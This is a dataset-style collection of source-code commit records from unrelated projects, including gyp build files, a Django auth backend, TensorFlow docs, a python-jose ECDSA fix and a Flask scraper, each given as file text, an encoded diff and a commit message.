{ "target_defaults": { "target_conditions": [ ["OS != 'win'", { "cflags": ["-fdata-sections", "-ffunction-sections", "-fvisibility=hidden"], "ldflags": ["-Wl,--gc-sections"] }], ["OS == 'mac'", { "xcode_settings": { "MACOSX_DEPLOYMENT_TARGET": "10.9", } }] ] }, "targets": [ { "target_name": "libargon2", "sources": [ "argon2/src/argon2.c", "argon2/src/core.c", "argon2/src/blake2/blake2b.c", "argon2/src/thread.c", "argon2/src/encoding.c", ], "include_dirs": ["argon2/include"], "cflags": ["-march=native", "-Wno-type-limits"], "conditions": [ ["target_arch == 'ia32' or target_arch == 'x64'", { "cflags+": ["-msse", "-msse2"], "sources+": ["argon2/src/opt.c"] }, { "sources+": ["argon2/src/ref.c"] }] ], "type": "static_library" }, { "target_name": "argon2", "sources": [ "src/argon2_node.cpp" ], "include_dirs": [ "<!(node -e \"require('nan')\")", "argon2/include" ], "dependencies": ["libargon2"], "configurations": { "Debug": { "conditions": [ ["OS == 'linux'", { "cflags": ["--coverage", "-Wall", "-Wextra"], "ldflags": ["-fprofile-arcs", "-ftest-coverage"], }] ] }, "Release": { "defines+": ["NDEBUG"] } } } ] }
Python
0
@@ -318,24 +318,144 @@ %7D%0A %7D%5D%0A + %5D,%0A %22target_configurations%22: %5B%0A %5B%7B%0A %22Release%22: %7B%0A %22defines+%22: %5B%22NDEBUG%22%5D%0A %7D%0A %7D%5D%0A %5D%0A %7D,%0A @@ -1563,73 +1563,8 @@ %5D%0A - %7D,%0A %22Release%22: %7B%0A %22defines+%22: %5B%22NDEBUG%22%5D%0A
b0dea361dfb27e537c0165dac69e71c20f33e883
Add helpers to bindings.gyp
binding.gyp
binding.gyp
{ 'targets': [ { 'target_name': 'jsaudio', 'sources': ['src/jsaudio.cc'], 'include_dirs': [ '<!(node -e "require(\'nan\')")', '<(module_root_dir)/vendor/' ], "conditions": [ [ 'OS=="win"', { "conditions": [ [ 'target_arch=="ia32"', { "libraries": [ '<(module_root_dir)/vendor/portaudio_x86.lib' ], 'copies': [ { 'destination': '<(module_root_dir)/build/Release/', 'files': [ '<(module_root_dir)/vendor/portaudio_x86.dll', '<(module_root_dir)/vendor/portaudio_x86.lib', ] }] } ], [ 'target_arch=="x64"', { "libraries": [ '<(module_root_dir)/vendor/portaudio_x64.lib' ], 'copies': [ { 'destination': '<(module_root_dir)/build/Release/', 'files': [ '<(module_root_dir)/vendor/portaudio_x64.dll', '<(module_root_dir)/vendor/portaudio_x64.lib', ] }] } ] ], "include_dirs": ["gyp/include"] } ] ] }] }
Python
0.000001
@@ -76,16 +76,34 @@ udio.cc' +, 'src/helpers.cc' %5D,%0A '
7e5cafed3908f829bb8ff334a7d8f6ebb939a7cc
fix test import for python3
d4s2_api/dukeds_auth.py
d4s2_api/dukeds_auth.py
from gcb_web_auth.dukeds_auth import DukeDSTokenAuthentication from gcb_web_auth.backends.dukeds import DukeDSAuthBackend from gcb_web_auth.backends.base import BaseBackend from models import DukeDSUser class D4S2DukeDSTokenAuthentication(DukeDSTokenAuthentication): """ Extends authorization to save users to DukeDSUser """ def __init__(self): self.backend = DukeDSAuthBackend() class D4S2DukeDSAuthBackend(DukeDSAuthBackend): """ Backend for DukeDS Auth that save users to DukeDSUser Conveniently, the keys used by DukeDS user objects are a superset of the django ones, so we rely on the filtering in the base class """ def __init__(self, save_tokens=True, save_dukeds_users=True): super(D4S2DukeDSAuthBackend, self).__init__(save_tokens, save_dukeds_users) self.save_tokens = save_tokens self.save_dukeds_users = save_dukeds_users self.failure_reason = None def save_dukeds_user(self, user, raw_user_dict): user_dict = DukeDSAuthBackend.harmonize_dukeds_user_details(raw_user_dict) dukeds_user, created = DukeDSUser.objects.get_or_create(user=user, dds_id=raw_user_dict.get('id')) if created: BaseBackend.update_model(dukeds_user, user_dict)
Python
0.000001
@@ -171,16 +171,17 @@ nd%0Afrom +. models i
5f8f93a366c7f1007a67849346eb094630ab15fb
Change different rounding date to March instead of April
custom/icds_reports/reports/incentive.py
custom/icds_reports/reports/incentive.py
from __future__ import unicode_literals, absolute_import, division from custom.icds_reports.models.views import AWWIncentiveReportMonthly from custom.icds_reports.utils import india_now, DATA_NOT_ENTERED class IncentiveReport(object): def __init__(self, location, month, aggregation_level): self.location = location self.month = month self.aggregation_level = aggregation_level def get_excel_data(self): def _format_infrastructure_data(data): return data if data else DATA_NOT_ENTERED if self.aggregation_level == 1: data = AWWIncentiveReportMonthly.objects.filter( month=self.month, state_id=self.location ).order_by('-district_name', '-block_name', '-supervisor_name') elif self.aggregation_level == 2: data = AWWIncentiveReportMonthly.objects.filter( month=self.month, district_id=self.location ).order_by('-block_name', '-supervisor_name') else: data = AWWIncentiveReportMonthly.objects.filter( month=self.month, block_id=self.location ).order_by('-supervisor_name') data = data.values( 'state_name', 'district_name', 'block_name', 'supervisor_name', 'awc_name', 'aww_name', 'contact_phone_number', 'wer_weighed', 'wer_eligible', 'awc_num_open', 'valid_visits', 'expected_visits', 'is_launched' ) headers = [ 'State', 'District', 'Block', 'Supervisor', 'AWC', 'AWW Name', 'AWW Contact Number', 'Home Visits Conducted', 'Number of Days AWC was Open', 'Weighing Efficiency', 'Eligible for Incentive' ] excel_rows = [headers] for row in data: row_data = [ row['state_name'], row['district_name'], row['block_name'], row['supervisor_name'], row['awc_name'], ] # AWC not launched if row['is_launched'] != 'yes': AWC_NOT_LAUNCHED = 'AWC not launched' row_data.extend([ AWC_NOT_LAUNCHED, AWC_NOT_LAUNCHED, AWC_NOT_LAUNCHED, AWC_NOT_LAUNCHED, AWC_NOT_LAUNCHED, AWC_NOT_LAUNCHED ]) else: if self.month.year < 2019 or (self.month.year == 2019 and self.month.month < 4): func = int else: func = round home_visit_percent = row['valid_visits'] / func(row['expected_visits']) if \ func(row['expected_visits']) else 1 weighing_efficiency_percent = row['wer_weighed'] / row['wer_eligible'] if \ row['wer_eligible'] else 1 if home_visit_percent > 1: home_visit_percent = 1 home_visit_conducted = '{:.2%}'.format(home_visit_percent) if row['awc_num_open'] is None: num_open = DATA_NOT_ENTERED else: num_open = row['awc_num_open'] weighing_efficiency = '{:.2%}'.format(weighing_efficiency_percent) eligible_for_incentive = 'Yes' if \ weighing_efficiency_percent >= 0.6 and home_visit_percent >= 0.6 else 'No' no_visits = row['valid_visits'] == 0 and row['expected_visits'] == 0 no_weights = row['wer_eligible'] == 0 if no_visits: home_visit_conducted = "No expected home visits" if no_weights: weighing_efficiency = "No expected weight measurement" if no_visits and no_weights: eligible_for_incentive = "Yes" row_data.extend([ _format_infrastructure_data(row['aww_name']), _format_infrastructure_data(row['contact_phone_number']), home_visit_conducted, num_open, weighing_efficiency, eligible_for_incentive ]) excel_rows.append(row_data) return [ [ 'AWW Performance Report', excel_rows ], [ 'Export Info', [ ['Generated at', india_now()], ['Grouped By', 'AWC'], ['Month', self.month.month], ['Year', self.month.year], ['Disclaimer', "The information in the report is based on the self-reported data entered by " "the Anganwadi Worker in ICDS-CAS mobile application and is subject to timely " "data syncs."] ] ] ]
Python
0.000024
@@ -2495,9 +2495,9 @@ h %3C -4 +3 ):%0A
a9104e7529eb75454aaaa2ea29b8ebe40ee7bbd0
Add documentation to sloppy_interleave function
tensorflow/contrib/data/python/ops/sloppy_ops.py
tensorflow/contrib/data/python/ops/sloppy_ops.py
# Copyright 2017 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Non-deterministic dataset transformations.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from tensorflow.python.data.ops import dataset_ops from tensorflow.python.data.util import nest from tensorflow.python.framework import dtypes from tensorflow.python.framework import function from tensorflow.python.framework import ops from tensorflow.python.ops import gen_dataset_ops class SloppyInterleaveDataset(dataset_ops.Dataset): """A `Dataset` that maps a function over its input and flattens the result.""" def __init__(self, input_dataset, map_func, cycle_length, block_length): """See `tf.contrib.data.sloppy_interleave()` for details.""" super(SloppyInterleaveDataset, self).__init__() self._input_dataset = input_dataset @function.Defun(*nest.flatten(input_dataset.output_types)) def tf_map_func(*args): """A wrapper for Defun that facilitates shape inference.""" # Pass in shape information from the input_dataset. for arg, shape in zip(args, nest.flatten(input_dataset.output_shapes)): arg.set_shape(shape) nested_args = nest.pack_sequence_as(input_dataset.output_types, args) if nest.is_sequence(nested_args): dataset = map_func(*nested_args) else: dataset = map_func(nested_args) if not isinstance(dataset, dataset_ops.Dataset): raise TypeError("`map_func` must return a `Dataset` object.") self._output_types = dataset.output_types self._output_shapes = dataset.output_shapes return dataset._as_variant_tensor() # pylint: disable=protected-access self._map_func = tf_map_func self._map_func.add_to_graph(ops.get_default_graph()) self._cycle_length = ops.convert_to_tensor( cycle_length, dtype=dtypes.int64, name="cycle_length") self._block_length = ops.convert_to_tensor( block_length, dtype=dtypes.int64, name="block_length") def _as_variant_tensor(self): return gen_dataset_ops.sloppy_interleave_dataset( self._input_dataset._as_variant_tensor(), # pylint: disable=protected-access self._map_func.captured_inputs, self._cycle_length, self._block_length, f=self._map_func, output_types=nest.flatten(self.output_types), output_shapes=nest.flatten(self.output_shapes)) @property def output_shapes(self): return self._output_shapes @property def output_types(self): return self._output_types def sloppy_interleave(map_func, cycle_length, block_length=1): """A non-deterministic version of the `Dataset.interleave()` transformation. `sloppy_interleave()` maps `map_func` across `dataset`, and non-deterministically interleaves the results. The resulting dataset is almost identical to `interleave`. The key difference is that if retrieving a value from a given output iterator would cause `get_next` to block, that iterator will be skipped, and consumed when next available. If consuming from all iterators would cause the `get_next` call to block, the `get_next` call blocks until the first value is available. If the underlying datasets produce elements as fast as they are consumed, the `sloppy_interleave` transformation behaves identically to `interleave`. However, if an underlying dataset would block the consumer, `sloppy_interleave` can violate the round-robin order (that `interleave` strictly obeys), producing an element from a different underlying dataset instead. WARNING: The order of elements in the resulting dataset is not deterministic. Use `Dataset.interleave()` if you want the elements to have a deterministic order. Args: map_func: A function mapping a nested structure of tensors (having shapes and types defined by `self.output_shapes` and `self.output_types`) to a `Dataset`. cycle_length: The number of threads to interleave from in parallel. block_length: The number of consecutive elements to pull from a thread before advancing to the next thread. Note: sloppy_interleave will skip the remainder of elements in the block_length in order to avoid blocking. Returns: A `Dataset` transformation function, which can be passed to @{tf.data.Dataset.apply}. """ def _apply_fn(dataset): return SloppyInterleaveDataset( dataset, map_func, cycle_length, block_length) return _apply_fn
Python
0.000001
@@ -4213,16 +4213,324 @@ stead.%0A%0A + Example usage:%0A%0A %60%60%60python%0A # Preprocess 4 files concurrently.%0A filenames = tf.data.Dataset.list_files(%22/path/to/data/train*.tfrecords%22)%0A dataset = filenames.apply(%0A tf.contrib.data.sloppy_interleave(%0A lambda filename: tf.data.TFRecordDataset(filename),%0A cycle_length=4))%0A %60%60%60%0A%0A WARNIN
efe41c344873454223e952e8edc3886c3aa77b78
Fix compatibility issue - ecdsa Curve is not hashable. (#261)
jose/backends/ecdsa_backend.py
jose/backends/ecdsa_backend.py
import hashlib import ecdsa from jose.backends.base import Key from jose.constants import ALGORITHMS from jose.exceptions import JWKError from jose.utils import base64_to_long, long_to_base64 class ECDSAECKey(Key): """ Performs signing and verification operations using ECDSA and the specified hash function This class requires the ecdsa package to be installed. This is based off of the implementation in PyJWT 0.3.2 """ SHA256 = hashlib.sha256 SHA384 = hashlib.sha384 SHA512 = hashlib.sha512 CURVE_MAP = { SHA256: ecdsa.curves.NIST256p, SHA384: ecdsa.curves.NIST384p, SHA512: ecdsa.curves.NIST521p, } def __init__(self, key, algorithm): if algorithm not in ALGORITHMS.EC: raise JWKError("hash_alg: %s is not a valid hash algorithm" % algorithm) self.hash_alg = { ALGORITHMS.ES256: self.SHA256, ALGORITHMS.ES384: self.SHA384, ALGORITHMS.ES512: self.SHA512, }.get(algorithm) self._algorithm = algorithm self.curve = self.CURVE_MAP.get(self.hash_alg) if isinstance(key, (ecdsa.SigningKey, ecdsa.VerifyingKey)): self.prepared_key = key return if isinstance(key, dict): self.prepared_key = self._process_jwk(key) return if isinstance(key, str): key = key.encode("utf-8") if isinstance(key, bytes): # Attempt to load key. We don't know if it's # a Signing Key or a Verifying Key, so we try # the Verifying Key first. try: key = ecdsa.VerifyingKey.from_pem(key) except ecdsa.der.UnexpectedDER: key = ecdsa.SigningKey.from_pem(key) except Exception as e: raise JWKError(e) self.prepared_key = key return raise JWKError("Unable to parse an ECKey from key: %s" % key) def _process_jwk(self, jwk_dict): if not jwk_dict.get("kty") == "EC": raise JWKError("Incorrect key type. Expected: 'EC', Received: %s" % jwk_dict.get("kty")) if not all(k in jwk_dict for k in ["x", "y", "crv"]): raise JWKError("Mandatory parameters are missing") if "d" in jwk_dict: # We are dealing with a private key; the secret exponent is enough # to create an ecdsa key. d = base64_to_long(jwk_dict.get("d")) return ecdsa.keys.SigningKey.from_secret_exponent(d, self.curve) else: x = base64_to_long(jwk_dict.get("x")) y = base64_to_long(jwk_dict.get("y")) if not ecdsa.ecdsa.point_is_valid(self.curve.generator, x, y): raise JWKError(f"Point: {x}, {y} is not a valid point") point = ecdsa.ellipticcurve.Point(self.curve.curve, x, y, self.curve.order) return ecdsa.keys.VerifyingKey.from_public_point(point, self.curve) def sign(self, msg): return self.prepared_key.sign( msg, hashfunc=self.hash_alg, sigencode=ecdsa.util.sigencode_string, allow_truncate=False ) def verify(self, msg, sig): try: return self.prepared_key.verify( sig, msg, hashfunc=self.hash_alg, sigdecode=ecdsa.util.sigdecode_string, allow_truncate=False ) except Exception: return False def is_public(self): return isinstance(self.prepared_key, ecdsa.VerifyingKey) def public_key(self): if self.is_public(): return self return self.__class__(self.prepared_key.get_verifying_key(), self._algorithm) def to_pem(self): return self.prepared_key.to_pem() def to_dict(self): if not self.is_public(): public_key = self.prepared_key.get_verifying_key() else: public_key = self.prepared_key crv = { ecdsa.curves.NIST256p: "P-256", ecdsa.curves.NIST384p: "P-384", ecdsa.curves.NIST521p: "P-521", }[self.prepared_key.curve] # Calculate the key size in bytes. Section 6.2.1.2 and 6.2.1.3 of # RFC7518 prescribes that the 'x', 'y' and 'd' parameters of the curve # points must be encoded as octed-strings of this length. key_size = self.prepared_key.curve.baselen data = { "alg": self._algorithm, "kty": "EC", "crv": crv, "x": long_to_base64(public_key.pubkey.point.x(), size=key_size).decode("ASCII"), "y": long_to_base64(public_key.pubkey.point.y(), size=key_size).decode("ASCII"), } if not self.is_public(): data["d"] = long_to_base64(self.prepared_key.privkey.secret_multiplier, size=key_size).decode("ASCII") return data
Python
0
@@ -667,24 +667,176 @@ T521p,%0A %7D +%0A CURVE_NAMES = (%0A (ecdsa.curves.NIST256p, %22P-256%22),%0A (ecdsa.curves.NIST384p, %22P-384%22),%0A (ecdsa.curves.NIST521p, %22P-521%22),%0A ) %0A%0A def __ @@ -4081,17 +4081,16 @@ red_key%0A -%0A @@ -4095,17 +4095,20 @@ crv = -%7B +None %0A @@ -4112,142 +4112,181 @@ - ecdsa.curves.NIST256p: %22P-256%22,%0A ecdsa.curves.NIST384p: %22P-384%22,%0A ecdsa.curves.NIST521p: %22P-521%22,%0A %7D%5B +for key, value in self.CURVE_NAMES:%0A if key == self.prepared_key.curve:%0A crv = value%0A if not crv:%0A raise KeyError(f%22Can't match %7B self @@ -4304,17 +4304,19 @@ ey.curve -%5D +%7D%22) %0A%0A
7c788c868323aa8c6237caab208d726c5cce24ac
address first time new user condition where user_id may be none
cis/user.py
cis/user.py
"""First class object to represent a user and data about that user.""" import logging from cis.settings import get_config logger = logging.getLogger(__name__) class Profile(object): def __init__(self, boto_session=None, profile_data=None): """ :param boto_session: The boto session object from the constructor. :param profile_data: The decrypted user profile JSON. """ self.boto_session = boto_session self.config = get_config() self.profile_data = profile_data self.dynamodb_table = None @property def exists(self): if self._retrieve_from_vault() is not None: return True else: return False def retrieve_from_vault(self): logger.info( 'Attempting to retrieve the following from the vault: {}'.format( self.profile_data.get('user_id') ) ) if not self.dynamodb_table: self._connect_dynamo_db() user_key = {'user_id': self.profile_data.get('user_id')} response = self.dynamodb_table.get_item(Key=user_key) self.profile_data = response return response def store_in_vault(self): logger.info( 'Attempting storage of the following user to the vault: {}'.format( self.profile_data.get('user_id') ) ) if not self.dynamodb_table: self._connect_dynamo_db() response = self.dynamodb_table.put_item( Item=self.profile_data ) return (response['ResponseMetadata']['HTTPStatusCode'] is 200) def _connect_dynamo_db(self): """New up a dynamodb resource from boto session.""" dynamodb = self.boto_session.resource('dynamodb') dynamodb_table = self.config('dynamodb_table', namespace='cis') self.dynamodb_table = dynamodb.Table(dynamodb_table)
Python
0.000009
@@ -1056,16 +1056,54 @@ r_id')%7D%0A +%0A if user_key is not None:%0A @@ -1156,16 +1156,59 @@ er_key)%0A + else:%0A response = None%0A%0A
81833470d1eb831e27e9e34712b983efbc38a735
Convert entire table to cartesian
solar_neighbourhood/prepare_data_add_kinematics.py
solar_neighbourhood/prepare_data_add_kinematics.py
""" Add very large RV errors for stars with no known RVs. Convert to cartesian. """ import numpy as np import sys sys.path.insert(0, '..') from chronostar import tabletool from astropy.table import Table datafile = Table.read('../data/ScoCen_box_result.fits') d = tabletool.read(datafile) # Set missing radial velocities (nan) to 0 d['radial_velocity'] = np.nan_to_num(d['radial_velocity']) # Set missing radial velocity errors (nan) to 1e+10 d['radial_velocity_error'][np.isnan(d['radial_velocity_error'])] = 1e+4 print('Convert to cartesian') tabletool.convert_table_astro2cart(table=d, return_table=True) d.write('../data/ScoCen_box_result_15M_ready_for_bg_ols.fits') print('Cartesian written.', len(d))
Python
0.999999
@@ -259,25 +259,21 @@ s')%0Ad = -t +T able -tool .read(da
452ceaa37bd070704d6acb276fdf9e4f0a9b3c56
Add logging to platform for debugging
setupext/platform.py
setupext/platform.py
# -*- coding: utf-8 -*- # ***************************************************************************** # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # See NOTICE file for details. # # ***************************************************************************** import warnings import setupext import os import sys import sysconfig # This handles all of the work to make our platform specific extension options. def Platform(include_dirs=[], sources=[]): platform_specific = { 'include_dirs': include_dirs, 'sources': setupext.utils.find_sources(sources), } fallback_jni = os.path.join('native', 'jni_include') # try to include JNI first from eventually given JAVA_HOME, then from distributed java_home = os.getenv('JAVA_HOME', '') found_jni = False if os.path.exists(java_home): platform_specific['include_dirs'] += [os.path.join(java_home, 'include')] # check if jni.h can be found for d in platform_specific['include_dirs']: if os.path.exists(os.path.join(str(d), 'jni.h')): print("Found native jni.h at %s" % d) found_jni = True break if not found_jni: warnings.warn('Falling back to provided JNI headers, since your provided' ' JAVA_HOME "%s" does not provide jni.h' % java_home) if not found_jni: platform_specific['include_dirs'] += [fallback_jni] platform_specific['extra_link_args'] = [] if sys.platform == 'win32': platform_specific['libraries'] = ['Advapi32'] platform_specific['define_macros'] = [('WIN32', 1)] if sys.version > '3': platform_specific['extra_compile_args'] = [ '/Zi', '/EHsc', '/std:c++14'] else: platform_specific['extra_compile_args'] = ['/Zi', '/EHsc'] platform_specific['extra_link_args'] = ['/DEBUG'] jni_md_platform = 'win32' elif sys.platform == 'darwin': platform_specific['libraries'] = ['dl'] platform_specific['define_macros'] = [('MACOSX', 1)] platform_specific['extra_compile_args'] = ['-g0', '-std=c++11'] jni_md_platform = 'darwin' elif sys.platform.startswith('linux'): platform_specific['libraries'] = ['dl'] platform_specific['extra_compile_args'] = ['-g0', '-std=c++11'] jni_md_platform = 'linux' elif sys.platform.startswith('aix7'): platform_specific['libraries'] = ['dl'] platform_specific['extra_compile_args'] = ['-g3', '-std=c++11'] jni_md_platform = 'aix7' elif sys.platform.startswith('freebsd'): jni_md_platform = 'freebsd' else: jni_md_platform = None warnings.warn("Your platform %s is not being handled explicitly." " It may work or not!" % sys.platform, UserWarning) platform_specific['extra_link_args'].append(sysconfig.get_config_var('BLDLIBRARY')) if found_jni: platform_specific['include_dirs'] += \ [os.path.join(java_home, 'include', jni_md_platform)] return platform_specific # include this stolen from FindJNI.cmake """ FIND_PATH(JAVA_INCLUDE_PATH2 jni_md.h ${JAVA_INCLUDE_PATH} ${JAVA_INCLUDE_PATH}/win32 ${JAVA_INCLUDE_PATH}/linux ${JAVA_INCLUDE_PATH}/freebsd ${JAVA_INCLUDE_PATH}/solaris ${JAVA_INCLUDE_PATH}/hp-ux ${JAVA_INCLUDE_PATH}/alpha )"""
Python
0.000001
@@ -847,16 +847,37 @@ ysconfig +%0Aimport distutils.log %0A%0A# This @@ -1620,13 +1620,26 @@ -print +distutils.log.info (%22Fo @@ -1765,32 +1765,37 @@ -warnings +distutils.log .warn('Falli @@ -1848,16 +1848,21 @@ ovided'%0A + @@ -2075,35 +2075,148 @@ -if sys.platform == 'win32': +distutils.log.info(%22Configure platform to%22, sys.platform)%0A if sys.platform == 'win32':%0A distutils.log.info(%22Add windows settings%22) %0A @@ -2671,16 +2671,66 @@ arwin':%0A + distutils.log.info(%22Add darwin settings%22)%0A @@ -2977,24 +2977,73 @@ h('linux'):%0A + distutils.log.info(%22Add linux settings%22)%0A plat @@ -3223,24 +3223,71 @@ th('aix7'):%0A + distutils.log.info(%22Add aix settings%22)%0A plat @@ -3469,24 +3469,75 @@ 'freebsd'):%0A + distutils.log.info(%22Add freebsd settings%22)%0A jni_ @@ -3610,24 +3610,29 @@ -warnings +distutils.log .warn(%22Y @@ -3681,16 +3681,21 @@ citly.%22%0A + @@ -3860,32 +3860,137 @@ if found_jni:%0A + distutils.log.info(%22Add JNI directory %25s%22 %25 os.path.join(java_home, 'include', jni_md_platform))%0A platform
0700e25b4dce989fcfc6ee367c7516578c8aaf5b
Update heartbeat in idle times
lava_scheduler_daemon/service.py
lava_scheduler_daemon/service.py
# Copyright (C) 2013 Linaro Limited # # Author: Senthil Kumaran <[email protected]> # # This file is part of LAVA Scheduler. # # LAVA Scheduler is free software: you can redistribute it and/or modify it # under the terms of the GNU Affero General Public License version 3 as # published by the Free Software Foundation # # LAVA Scheduler is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY # or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for # more details. # # You should have received a copy of the GNU Affero General Public License # along with LAVA Scheduler. If not, see <http://www.gnu.org/licenses/>. import logging import xmlrpclib from twisted.application.service import Service from twisted.internet import defer from twisted.internet.task import LoopingCall from lava_scheduler_app import utils from lava_scheduler_daemon.job import JobRunner, catchall_errback from lava_scheduler_daemon.worker import WorkerData class JobQueue(Service): def __init__(self, source, dispatcher, reactor, daemon_options): self.logger = logging.getLogger(__name__ + '.JobQueue') self.source = source self.dispatcher = dispatcher self.reactor = reactor self.daemon_options = daemon_options self._check_job_call = LoopingCall(self._checkJobs) self._check_job_call.clock = reactor def _checkJobs(self): self.logger.debug("Refreshing jobs") return self.source.getJobList().addCallback( self._startJobs).addErrback(catchall_errback(self.logger)) def _startJobs(self, jobs): # Update Worker Heartbeat # # NOTE: This will recide here till we finalize scheduler refactoring # and a separte module for worker specific daemon gets created. worker = WorkerData() # Record the scheduler tick (timestamp). worker.record_master_scheduler_tick() try: worker.put_heartbeat_data() except (xmlrpclib.Fault, xmlrpclib.ProtocolError) as err: worker.logger.error("Heartbeat update failed!") for job in jobs: new_job = JobRunner(self.source, job, self.dispatcher, self.reactor, self.daemon_options) self.logger.info("Starting Job: %d " % job.id) new_job.start() def startService(self): self.logger.info("\n\nLAVA Scheduler starting\n\n") self._check_job_call.start(20) def stopService(self): self._check_job_call.stop() return None
Python
0.000003
@@ -1476,210 +1476,8 @@ f):%0A - self.logger.debug(%22Refreshing jobs%22)%0A return self.source.getJobList().addCallback(%0A self._startJobs).addErrback(catchall_errback(self.logger))%0A%0A def _startJobs(self, jobs):%0A @@ -1506,16 +1506,16 @@ artbeat%0A + @@ -1671,16 +1671,62 @@ reated.%0A + self.logger.debug(%22Worker heartbeat%22)%0A @@ -2024,16 +2024,218 @@ led!%22)%0A%0A + self.logger.debug(%22Refreshing jobs%22)%0A return self.source.getJobList().addCallback(%0A self._startJobs).addErrback(catchall_errback(self.logger))%0A%0A def _startJobs(self, jobs):%0A
5874429ac469f18067243bb6f35a0c27bf4a1a2f
Fix error in ajax item
aukro/core.py
aukro/core.py
#!/usr/bin/env python # -*- coding: utf-8 -*- from flask import Blueprint, jsonify, render_template, request, url_for from aukro import app, db from aukro.parser import Parser import re # create blueprint core = Blueprint("core", __name__, template_folder="templates") @core.route("/") def index(): return render_template("index.html") @core.route("/seller/") def seller(): search = request.args.get("search", "") seller = {} # init parser parser = Parser(charset="utf-8") # try to find seller id data = parser.data(search) if data and "uid" in data: seller['id'] = data["uid"] else: try: page = parser.grab(search, tree=False) except: error = dict(reason=u"Не удалось найти продавца", details=u"Неправильная ссылка или нет связи с сервером") return render_template("seller.html", error=error) result = re.search("data-seller=[\"\']([0-9]+)[\"\']", page, flags=re.I | re.M) if result and result.group(1): seller['id']= result.group(1) else: error = dict(reason=u"Не удалось найти продавца", details=u"Неправильная ссылка") return render_template("seller.html", error=error) #request seller info page try: page = parser.grab("http://aukro.ua/show_user.php?uid=%s&type=fb_seller" % seller['id']) except: error = dict(reason=u"Не удалось найти информацию о продавце", details=u"Нет связи с сервером") return render_template("seller.html", error=error) try: el = page.cssselect(".main-title .user .uname") if el: seller['name'] = el[0].text_content().strip() el = page.cssselect(".main-title .user .user-rating") if el: seller['rating'] = el[0].text_content().strip() el = page.cssselect(".feedbacksSummary table") if el: seller['info'] = parser.html(el[0]) except: error = dict(reason=u"Не удалось найти информацию о продавце", details=u"Нет нужной информации на странице") return render_template("seller.html", error=error) return render_template("seller.html", seller=seller) @core.route("/ajax/item/") def ajax_seller_list(id, count=9999): link = request.args.get("link", "") result = [] # init parser parser = Parser(charset="utf-8") #request item page try: page = parser.grab(link) except: error = dict(reason=u"Не удалось найти страницу товара", details=u"Неправильная ссылка или нет связи с сервером") return jsonify(error=error) try: el = page.cssselect(".product.productwide h1 [itemprop='name']") if el: result['name'] = el[0].text_content().strip() el = page.cssselect(".product.productwide .main meta[itemprop='price']") if el: result['price'] = el[0].get("content") el = page.cssselect(".product.productwide .main meta[itemprop='priceCurrency']") if el: result['currency'] = el[0].get("content") except: error = dict(reason=u"Не удалось найти информацию о товаре", details=u"Нет нужной информации на странице") return jsonify(error=error) return jsonify(result=result) @core.route("/ajax/seller/<int:id>/list/<int:count>/") def ajax_seller_list(id, count=9999): page_number = 1 result = [] # init parser parser = Parser(charset="utf-8") while len(result) < count: #request seller info page try: page = parser.grab("http://aukro.ua/show_user.php?uid=%s&type=fb_seller&p=%s" % (id, page_number)) except: error = dict(reason=u"Не удалось загрузить список", details=u"Нет связи с сервером") return jsonify(error=error) try: for el in page.cssselect(".feedbacks-row"): rows = el.cssselect("td") if rows and len(rows) >= 4: data = dict(datetime=rows[2].text_content().strip(), type=rows[1].text_content().strip(), item=rows[3].text_content().strip(), link=rows[3].cssselect("a")[0].get("href")) result.append(data) except: pass if page.cssselect(".pagination li.next"): page_number += 1 else: break return jsonify(result=result)
Python
0.000002
@@ -2228,34 +2228,13 @@ jax_ -seller_list(id, count=9999 +item( ):%0A @@ -2277,34 +2277,34 @@ %22)%0A result = -%5B%5D +%7B%7D %0A%0A # init par @@ -2623,32 +2623,12 @@ ct(%22 -.product.productwide h1 +meta %5Bite @@ -2693,37 +2693,29 @@ = el%5B0%5D. -text_ +get(%22 content -().strip( +%22 )%0A%0A @@ -2742,35 +2742,8 @@ ct(%22 -.product.productwide .main meta @@ -2863,35 +2863,8 @@ ct(%22 -.product.productwide .main meta
fedb3768539259568555d5a62d503c7995f4b9a2
Handle orgs that you don’t own personally.
readthedocs/oauth/utils.py
readthedocs/oauth/utils.py
import logging from .models import GithubProject, GithubOrganization log = logging.getLogger(__name__) def make_github_project(user, org, privacy, repo_json): if (repo_json['private'] is True and privacy == 'private' or repo_json['private'] is False and privacy == 'public'): project, created = GithubProject.objects.get_or_create( user=user, organization=org, full_name=repo_json['full_name'], ) project.name = repo_json['name'] project.description = repo_json['description'] project.git_url = repo_json['git_url'] project.ssh_url = repo_json['ssh_url'] project.html_url = repo_json['html_url'] project.json = repo_json project.save() return project else: log.debug('Not importing %s because mismatched type' % repo_json['name']) def make_github_organization(user, org_json): org, created = GithubOrganization.objects.get_or_create( login=org_json.get('login'), html_url=org_json.get('html_url'), name=org_json.get('name'), email=org_json.get('email'), json=org_json, ) org.users.add(user) return org
Python
0
@@ -368,18 +368,84 @@ -user= +full_name=repo_json%5B'full_name'%5D,%0A )%0A if project.user != user -, +: %0A @@ -457,25 +457,170 @@ -organization=org, +log.debug('Not importing %25s because mismatched user' %25 repo_json%5B'name'%5D)%0A return None%0A if project.organization and project.organization != org: %0A @@ -624,34 +624,79 @@ -full_name= +log.debug('Not importing %25s because mismatched orgs' %25 repo_json%5B'f @@ -694,38 +694,80 @@ o_json%5B' -full_ name'%5D -,%0A ) +)%0A return None%0A project.organization=org %0A
b23415e3f3c34c3911e4e05758a41a81e5882453
Replace space in "Fraction of Zero Values" with _ because using space is illegal and will be auto replaced.
tensorflow/contrib/slim/python/slim/summaries.py
tensorflow/contrib/slim/python/slim/summaries.py
